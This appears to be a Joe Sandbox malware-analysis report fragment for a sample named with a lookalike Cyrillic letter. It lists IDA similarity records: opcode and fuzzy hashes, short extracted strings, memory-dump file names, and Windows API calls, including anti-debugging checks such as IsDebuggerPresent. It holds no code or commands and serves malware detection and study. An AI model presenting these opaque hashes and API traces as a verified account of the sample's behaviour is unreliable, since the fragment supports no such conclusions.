                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /iwc$/iwc$j94$$j94$$2SA$2SA$n^?
                                                                                            • API String ID: 0-1377534680
                                                                                            • Opcode ID: a2c371cd3685d763fac5988789b61846975726d7486310896a927a6c553f7561
                                                                                            • Instruction ID: 9d02c35161b53e0573dc97ffa175050092f17463031e9f07d028a501bca56a9a
                                                                                            • Opcode Fuzzy Hash: a2c371cd3685d763fac5988789b61846975726d7486310896a927a6c553f7561
                                                                                            • Instruction Fuzzy Hash: 6B620676E441058FCF048F7CD5D13DD7BF2EB86364F269219E4A1EBEA5C22EA4498B10
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDD1BD6
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6CDD1CA2
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDD1CC2
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDD1CCC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 254469556-0
                                                                                            • Opcode ID: 91627b82bce9a2fdcefef35a720ae18fc97a5e921de0c6bea7d0580c99581b67
                                                                                            • Instruction ID: 433519a28364ef885a66af903ac5fdcfceaac0342dba6469df991c191f86d3c2
                                                                                            • Opcode Fuzzy Hash: 91627b82bce9a2fdcefef35a720ae18fc97a5e921de0c6bea7d0580c99581b67
                                                                                            • Instruction Fuzzy Hash: 0B311875D05218DBDF10DFA4D9897CDBBB8FF08304F1041AAE509AB250EB71AA898F55
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDD4652
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDD465C
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDD4669
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 0f6fc79c7381ea12ef08018e8b0a670dd5f942a65a9cc1a052943920fd76f99f
                                                                                            • Instruction ID: 6400ec2c0f5e7fa2259131ab383eac9063202ade6d97bec3bca25c72a44dabbd
                                                                                            • Opcode Fuzzy Hash: 0f6fc79c7381ea12ef08018e8b0a670dd5f942a65a9cc1a052943920fd76f99f
                                                                                            • Instruction Fuzzy Hash: 8631E775D012189BCB21DF64D9887CCBBB8FF48314F5142DAE51CA72A0E770AB858F54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 22#8$SLZ/$`UZg
                                                                                            • API String ID: 0-4122401267
                                                                                            • Opcode ID: 288ee2bce7103384c5a054534002528cfa115474a16b14fcab4be05cf5fd8009
                                                                                            • Instruction ID: be960ea10d7f29b3adf66c8a5aa4a951c473e5ad5a8700c0a299bc7f95b96ee3
                                                                                            • Opcode Fuzzy Hash: 288ee2bce7103384c5a054534002528cfa115474a16b14fcab4be05cf5fd8009
                                                                                            • Instruction Fuzzy Hash: 5652F370504B418FD735CF39C490666BFE2BF59314F188A6DD4EA8BB92D735A80ACB50
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,6CDD3357,?,00000001,?,?), ref: 6CDD337A
                                                                                            • TerminateProcess.KERNEL32(00000000,?,6CDD3357,?,00000001,?,?), ref: 6CDD3381
                                                                                            • ExitProcess.KERNEL32 ref: 6CDD3393
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 7c9a5c7170214c351651859c50ff003d2e9281227f864c773970b969155d700f
                                                                                            • Instruction ID: d7ea4e2ac2cb19b54bf6b8cf3b7cc6a619e7f1aa95100bc311965ee9fe10e39a
                                                                                            • Opcode Fuzzy Hash: 7c9a5c7170214c351651859c50ff003d2e9281227f864c773970b969155d700f
                                                                                            • Instruction Fuzzy Hash: D5E0B631A11148EBDF116B94CA48EA87B7AEB81245F124519FA0586A30CB35F996DB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,#$XY$hVkg
                                                                                            • API String ID: 0-3157124528
                                                                                            • Opcode ID: d8e07519e3664dec0322d4856f058b50cc952020e8b5f40ddabfe29399a635cf
                                                                                            • Instruction ID: 65fde0d2715ff3e8e0db5466c81262052983b95b883f6d18e060753da176a39f
                                                                                            • Opcode Fuzzy Hash: d8e07519e3664dec0322d4856f058b50cc952020e8b5f40ddabfe29399a635cf
                                                                                            • Instruction Fuzzy Hash: 4DD101755483808BE714CF25C8957ABBFE2FBD5314F188A2CE4D58B292D739C94ACB42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$hVkg$x
                                                                                            • API String ID: 0-3103696286
                                                                                            • Opcode ID: 072cb71bf26747f87b983939a6e1ada988f371099c2d1c705f68f80655460780
                                                                                            • Instruction ID: 5831383f57242c750d63eb0118bd3430758a248c3de37cf535872329d5921361
                                                                                            • Opcode Fuzzy Hash: 072cb71bf26747f87b983939a6e1ada988f371099c2d1c705f68f80655460780
                                                                                            • Instruction Fuzzy Hash: 0691363520C3858AE705CF29C4907BAFFE1AFE3304F1846ADE4D597392DB69850AC752
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @.$@.
                                                                                            • API String ID: 0-2970659124
                                                                                            • Opcode ID: 7bb7c14e127d734eafd498529f6adb92b06d0e4d8aaae540eba6094b06eae7a9
                                                                                            • Instruction ID: 96a0d06bba3f05fb864476a4b3ab2da53d8e10661b8cdc824d60f122f91e3979
                                                                                            • Opcode Fuzzy Hash: 7bb7c14e127d734eafd498529f6adb92b06d0e4d8aaae540eba6094b06eae7a9
                                                                                            • Instruction Fuzzy Hash: F3B1A1B6F412098FCF04CFBCC981ADEB7F5AB5A364F108116E821E7794C2399905CB56
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5|iL$7654
                                                                                            • API String ID: 0-3845795888
                                                                                            • Opcode ID: 918c0c1a8a8ef6f7d4aa39418e29e6072ade66776cf4155e4daa52008b11cde1
                                                                                            • Instruction ID: c31ac0460285437e8efa44f1c8978fb8cee63cb8383186fb4a16022d3bcb9888
                                                                                            • Opcode Fuzzy Hash: 918c0c1a8a8ef6f7d4aa39418e29e6072ade66776cf4155e4daa52008b11cde1
                                                                                            • Instruction Fuzzy Hash: 34512836F056115BD710CE29CC8029ABBE3FBC5728F1EC268E89897354DA74DC0687D2
                                                                                            APIs
                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDDABDC,?,?,00000008,?,?,6CDDA874,00000000), ref: 6CDDAE0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3997070919-0
                                                                                            • Opcode ID: 46aad9f5fc8abdd083fbe1cb7f2bc539f47cd27e161805c56eef805bd6707dc0
                                                                                            • Instruction ID: 1ccbb858d71bf74cff855464dfda12129807db7b8fa139d31b476df6254f8cd3
                                                                                            • Opcode Fuzzy Hash: 46aad9f5fc8abdd083fbe1cb7f2bc539f47cd27e161805c56eef805bd6707dc0
                                                                                            • Instruction Fuzzy Hash: B1B13835A11609CFD704CF28C486B957BA0FF45369F26C658E8AACF6B1C335E982CB40
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDD1DAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: FeaturePresentProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 2325560087-0
                                                                                            • Opcode ID: 5a6b709c9240fde0c670f738fab843d635d6dc2e6935a81cf3fa2aa09adcefed
                                                                                            • Instruction ID: 23d3a87275d7f55f73b9d2156ea60c72c4e4d50bf9088ccb9da4de3deddb9006
                                                                                            • Opcode Fuzzy Hash: 5a6b709c9240fde0c670f738fab843d635d6dc2e6935a81cf3fa2aa09adcefed
                                                                                            • Instruction Fuzzy Hash: EF516FB2E01616CFEB08CF65C88179ABBF0FB49764F25896AD455EB650D378E900CF90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0
                                                                                            • API String ID: 0-4108050209
                                                                                            • Opcode ID: 6dbc7a817f029638db7c2ad2469da9e09998ece389b35f285a111443c669f18b
                                                                                            • Instruction ID: b3c92ad337c4bb88f6a3d2e66c469a9c91415fb0075a056707bff97223aa698e
                                                                                            • Opcode Fuzzy Hash: 6dbc7a817f029638db7c2ad2469da9e09998ece389b35f285a111443c669f18b
                                                                                            • Instruction Fuzzy Hash: 9D914C37E1999147D7188E7C4C413E97E62AB97334F2D83B9DCB1973E5C2698E068390
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,
                                                                                            • API String ID: 0-3772416878
                                                                                            • Opcode ID: 8b5af7b338855678a260b67441181896d7c7f80f72a1dc7c660094924f1e74f9
                                                                                            • Instruction ID: 1c8e819c7a87f86848228553dba666302cf444743daf4402029a7cd10ce3e1a0
                                                                                            • Opcode Fuzzy Hash: 8b5af7b338855678a260b67441181896d7c7f80f72a1dc7c660094924f1e74f9
                                                                                            • Instruction Fuzzy Hash: 4CB138711083819FD325CF18C88466BBFE0AFA9708F444E2DE5D997382D671E958CB67
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /AG
                                                                                            • API String ID: 0-429173468
                                                                                            • Opcode ID: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
                                                                                            • Instruction ID: 19355c3563b6decd6e17f41c518043b2dfb013fe7c8170f6e733a8f7f1818990
                                                                                            • Opcode Fuzzy Hash: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
                                                                                            • Instruction Fuzzy Hash: 336133B6610B118BD324CF25D891663BBF2FFD3314B49992CC4D68BA95E778B806CB50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 7ec14b1a9585c448c699c38ab10fe0aa2ad1a543d96d8fca562bcbf6b5dc87d4
                                                                                            • Instruction ID: 1e80f3644be9c27b3bcc81ccef9dac8d096cd2ff018d2bac753c5471e3c028f3
                                                                                            • Opcode Fuzzy Hash: 7ec14b1a9585c448c699c38ab10fe0aa2ad1a543d96d8fca562bcbf6b5dc87d4
                                                                                            • Instruction Fuzzy Hash: 9031FF716083089BC314DF68D8D166BFBF4FF8B344F05882DE98887390E37099488B96
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 7f8523cfbdca381f97c52d432f5540170b182dd21c3c8eefb024436658760b20
                                                                                            • Instruction ID: 799c0708ede9e5c6cb78b166bfd8642e942f4003a60cd918e197407ebd0140a4
                                                                                            • Opcode Fuzzy Hash: 7f8523cfbdca381f97c52d432f5540170b182dd21c3c8eefb024436658760b20
                                                                                            • Instruction Fuzzy Hash: EEA01130B002208BAB008E30828AB0A3BF8EA82280B08822AA000C0000EB2C8080AB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 742b48849c1e11f22bef16670be6564fdd31cfa55204fcfcb013f01fc1ce642f
                                                                                            • Instruction ID: 3aa6b32799a42a389d79e672250e862df93a4fedc4c612667f943c7a31f08057
                                                                                            • Opcode Fuzzy Hash: 742b48849c1e11f22bef16670be6564fdd31cfa55204fcfcb013f01fc1ce642f
                                                                                            • Instruction Fuzzy Hash: C5726C71508F818ED3328F3D8889796BFD56B5A324F088A5DD1FA8B3C2C7B96105C766
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db55ed65fbe2ecf1a612635444ad316c06479d6ce812981382e063f83aa73b1e
                                                                                            • Instruction ID: 4a130ed5482d303952344f668848b21d3098b371e676df7ca10fe75df52c3588
                                                                                            • Opcode Fuzzy Hash: db55ed65fbe2ecf1a612635444ad316c06479d6ce812981382e063f83aa73b1e
                                                                                            • Instruction Fuzzy Hash: 8AA11336B44265CFCF04CFBCC4913DEBBF9AB4A358F108116E465E7B60C22AD9098B56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f945403ecbe07682ad937ee94bd2165b265485f7ec6e19aad66908354466a1b3
                                                                                            • Instruction ID: 0cbc1fda8abc724f99ea8690ddfd075986276de06381220a20f3aaedfe0ecd94
                                                                                            • Opcode Fuzzy Hash: f945403ecbe07682ad937ee94bd2165b265485f7ec6e19aad66908354466a1b3
                                                                                            • Instruction Fuzzy Hash: B3812536A046614FCB228E38885036ABFE1BB95364F19C67DE8B9CB392D634CC45C3C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e574b59e77aa92d82939a69e6f381b8f293f4bc18f304c105db34e19d70d5e43
                                                                                            • Instruction ID: 75f123411aba3680a4af6f0bf4fd300d052abe2da9b16527ee74b08230dbf1a0
                                                                                            • Opcode Fuzzy Hash: e574b59e77aa92d82939a69e6f381b8f293f4bc18f304c105db34e19d70d5e43
                                                                                            • Instruction Fuzzy Hash: 65712737B195A14BD7148D3C6C962AAAE532FD733473E8379D9B59B3D2CA368D024340
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a380f5dc1015369e5d36fe1e74030a71b35efddb49622b43951d89b320ed9838
                                                                                            • Instruction ID: 195ba13b92d5b6d85cc48c4a6e982df52d087dbb8740c597961ce94d494cbb5b
                                                                                            • Opcode Fuzzy Hash: a380f5dc1015369e5d36fe1e74030a71b35efddb49622b43951d89b320ed9838
                                                                                            • Instruction Fuzzy Hash: 78514BB15087548FE314DF69D89475BBBE1BBC8318F044A2DE4E987351E379DA088B82
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6a0450f2eadb08f27bfff926aa74b3c2acd30d389b218c6601a8f7cc26ac0891
                                                                                            • Instruction ID: 38a65575f853a4d31a0bdb224262a5bf5d0665e46f5bed8744db279a38d40d7a
                                                                                            • Opcode Fuzzy Hash: 6a0450f2eadb08f27bfff926aa74b3c2acd30d389b218c6601a8f7cc26ac0891
                                                                                            • Instruction Fuzzy Hash: 912192C250D5C911B76A81B8E8452C99F2225634701FD0BBFD2436A7A38EDBCCD7C115
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76802b93250662603ba4b76ca3674e0ccea2824d8416913193f492fc27d3feb5
                                                                                            • Instruction ID: 799fc3ebeb199df7f58ab5205c0d6bbf9c0dcd830c9899a6aafc969f771a6ee7
                                                                                            • Opcode Fuzzy Hash: 76802b93250662603ba4b76ca3674e0ccea2824d8416913193f492fc27d3feb5
                                                                                            • Instruction Fuzzy Hash: 6A2172C290D98911BB6A81B8D8492C5DF2225624701FD0BBFD243AA7A28EE7CCD7C115
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
